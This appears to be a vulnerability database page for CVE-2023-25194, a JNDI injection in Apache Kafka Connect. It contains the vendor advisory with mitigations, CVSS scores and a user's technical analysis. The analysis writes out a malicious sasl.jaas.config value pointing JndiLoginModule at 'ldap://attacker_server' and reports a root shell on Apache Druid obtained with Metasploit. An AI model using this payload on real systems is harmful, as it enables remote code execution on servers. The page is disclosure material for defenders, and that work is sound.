Attacker Value
Low
(1 user assessed)
Exploitability
Moderate
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Network
2

CVE-2023-25194

Disclosure Date: February 07, 2023
CVE-2023-25194 CVSS v3 Base Score: 8.8
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

A possible security vulnerability has been identified in Apache Kafka Connect API.
This requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config
and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka Connect 2.3.0.
When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the sasl.jaas.config
property for any of the connector’s Kafka clients to “com.sun.security.auth.module.JndiLoginModule”, which can be done via the
producer.override.sasl.jaas.config, consumer.override.sasl.jaas.config, or admin.override.sasl.jaas.config properties.
This will allow the server to connect to the attacker’s LDAP server
and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server.
Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath.

Since Apache Kafka 3.0.0, users are allowed to specify these properties in connector configurations for Kafka Connect clusters running with out-of-the-box
configurations. Before Apache Kafka 3.0.0, users may not specify these properties unless the Kafka Connect cluster has been reconfigured with a connector
client override policy that permits them.

Since Apache Kafka 3.4.0, we have added a system property (“-Dorg.apache.kafka.disallowed.login.modules”) to disable the problematic login modules usage
in SASL JAAS configuration. Also by default “com.sun.security.auth.module.JndiLoginModule” is disabled in Apache Kafka Connect 3.4.0.

We advise the Kafka Connect users to validate connector configurations and only allow trusted JNDI configurations. Also examine connector dependencies for
vulnerable versions and either upgrade their connectors, upgrading that specific dependency, or removing the connectors as options for remediation. Finally,
in addition to leveraging the “org.apache.kafka.disallowed.login.modules” system property, Kafka Connect users can also implement their own connector
client config override policy, which can be used to control which Kafka client properties can be overridden directly in a connector config and which cannot.

Add Assessment

1
Ratings
  • Attacker Value
    Low
  • Exploitability
    Medium
Common in enterpriseUnauthenticatedDifficult to weaponize
Technical Analysis

Description

This is an interesting JNDI vulnerability in Apache Kafka Connect. An unauthenticated attacker can archive RCE by hosting a payload on a malicious LDAP server and tricking the Kafka server into connecting to it and deserializing the LDAP response. This allows the attacker to execute java deserialization gadgets chains of the Kafka server.

The Kafka Connect REST API on vulnerable instances allow attackers to set the database.history.producer.sasl.jaas.config connector property to "com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://attacker_server" useFirstPass="true" serviceName="x" debug="true" group.provider.url="xxx";". And “boom goes the dynamite” – with the right gadget chain you have RCE.

Attacker Rating and Exploitability.

Apache Kafka is middleware – it’s not an application that will be just sitting on the edge of a network like a Firewall or a VPN. Apache Kafka is used by other applications adding a layer of abstraction to the exploit process. Lots of applications use it and a list of application that use it can be found here. How those applications use Kafka could vary making the exploit process different in each product. Apache Druid however uses Kafka and affected versions are vulnerable out of the box!

Apache Druid

Apache Druid uses Apache Kafka Connect by default and there’s a metasploit module written to exploit this Kafka vulnerability on running inside Apache Druid. I tested this with the Metasploit module linked above and the provided docker container (image: vulhub/apache-druid:25.0.0). I received a shell running in the context of the root user.

Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
8.8 High
Impact Score:
5.9
Exploitability Score:
2.8
Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
Apache Kafka Connect API 3.4.0
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Vendors

  • apache

Products

  • kafka connect

References

Canonical
CVE-2023-25194 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194)
Exploit
The following exploit POCs have not been verified by Rapid7 researchers, but are sourced from: nomi-sec/PoC-in-GitHub.
Additional sources will be added here as they become relevant.
Notes: We will only add the top 3 POCs for a given CVE. POCs added here must have at least 2 GitHub stars.
Flink-Kafka-Vul (https://github.com/Veraxy00/Flink-Kafka-Vul)
Miscellaneous
https://kafka.apache.org/cve-list
https://lists.apache.org/thread/vy1c7fqcdqvq5grcqp6q5jyyb302khyz
http://packetstormsecurity.com/files/173151/Apache-Druid-JNDI-Injection-Remote-Code-Execution.html

Additional Info

Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Technical Analysis